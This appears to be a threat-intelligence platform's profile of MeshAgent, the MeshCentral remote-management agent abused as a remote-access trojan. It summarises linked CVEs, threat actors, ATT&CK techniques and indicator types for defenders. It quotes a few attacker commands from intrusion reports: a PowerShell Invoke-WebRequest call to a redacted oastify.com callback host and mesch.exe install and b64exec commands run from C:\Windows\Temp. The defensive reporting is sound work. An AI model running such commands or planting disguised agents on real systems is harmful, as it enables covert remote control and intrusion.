MeshAgent is the open-source endpoint agent of the MeshCentral remote monitoring and management platform. It provides remote desktop access and remote system administration, including command execution and file transfer. Although legitimate dual-use software, it is frequently weaponized as a remote-access trojan in intrusions. Threat actors have deployed modified or attacker-configured MeshAgent installations as privileged auto-start services, including SYSTEM-level services, to establish durable remote control over compromised Windows environments; communications can use encrypted WebSocket connections to attacker-controlled MeshCentral infrastructure. Observed abuse includes lateral movement, redundant persistence alongside other RMM products, and post-compromise deployment following other implants. Delivery has occurred through phishing lures, fake CAPTCHA-gated download pages, trojanized software installers, and deceptive software-update pages. MeshAgent has been used by clusters including UNC5687 and PhantomCore, as well as in ransomware-related intrusions involving Sinobi, Toy Ghouls, Medusa, and Osiris activity. It has also been reported in Android-focused operations masquerading as Ukrainian battlefield-management applications.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
On June 10th, 2026, Oracle disclosed a critical unauthenticated Remote Code Execution (RCE) vulnerability impacting its Oracle PeopleSoft PeopleTools application, tracked as CVE-2026-35273 (CVSS: 9.8). Successful exploitation of the flaw can result in full takeover of PeopleSoft Enterprise PeopleTools.
CVE-2025-31161 is a 9.8 CVSS critical severity vulnerability that affects how the CrushFTP file transfer application handles user authentication... CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability in the S3 authorization header processing that allows authentication bypass.
CVE-2025-30406 is a 9.0 critical severity vulnerability pertaining to hardcoded keys set by default in the CentreStack and Triofox configuration files. This weakness can be leveraged to abuse the ASPX ViewState ... with ViewState deserialization ... Exploitation leads to remote code execution.
To achieve persistence, attackers added new malicious users, utilized remote monitoring and management (RMM) tools such as MeshAgent...
8 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Toy Ghouls uses remote-administration tools including MeshAgent, RuDesktop, and AnyDesk for lateral movement. Observed MeshAgent samples connected to C2 servers also previously seen in Head Mare activity.
Post lazarusholic lazarusholic.bsky.social ... "‘보안 메일’도 안심 금물! 카드사 사칭 악성 파일 유포 중" published by Ahnlab. #Kimsuky, #LNK, #MeshAgent, #DPRK, #CTI
PhantomCore registers phishing domains with fake CAPTCHAs used to deliver MeshAgent samples, and domains for the corresponding MeshCentral servers.
Remote Access: An instance of MeshAgent is silently installed, providing the attackers with persistent remote control over the infected system.
"To maintain persistence, they abused remote monitoring and management (RMM) tools, specifically SimpleHelp and MeshAgent."
ShadowSyndicate continues to be associated with toolkits including ... MeshAgent ...
24 distinct techniques documented for this family, organized by ATT&CK tactic.
T1583 Acquire Infrastructure QuadSwitcher acquired infrastructure to host their tooling.
PhantomCore registers phishing domains with fake CAPTCHAs used to deliver MeshAgent samples, and domains for the corresponding MeshCentral servers
PhantomCore gains access to servers of legitimate sites and later uses them to store samples of MeshAgent, PhantomTaskShell, and Rsocx
PhantomCore uses external services for remote access: SSH (tunneling) and MeshAgent
it seems that the threat actor attacked the development company and distributed installers with malware strains
Once initial access was gained, the threat actors deployed customized MeshCentral agents disguised as legitimate cloud endpoints, which they used to run queries, perform lateral movement, and deploy custom scripts.
The earliest known indicators of compromise... This was a test of reliable code execution: powershell.exe Invoke-WebRequest -Uri http://REDACTED.oastify.com/REDACTED
C:\Windows\Temp\mesch.exe run ... C:\Windows\Temp\mesch.exe b64exec ... C:\Windows\Temp\mesch.exe -fullinstall
The malicious installer connects to the C&C server and downloads encrypted configuration data.
MeshAgent... communicating over encrypted WebSocket (WSS) to an attacker-controlled server... T1071.001 Application Layer Protocol: Web Protocols
57 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
30 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Remote access tool/RAT listed as part of the Medusa operators’ command-and-control tooling.
Legitimate MeshCentral agent weaponized by Sinobi operators into a covert SYSTEM-level backdoor for encrypted C2 and persistence, blending with normal remote management traffic.
MeshAgent is referenced as a named tool/malware in an AhnLab post about malicious file distribution impersonating a card company, with Kimsuky-related tagging.
Referenced as a remote management tool whose configuration files are downloaded by another malicious component during the intrusion.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.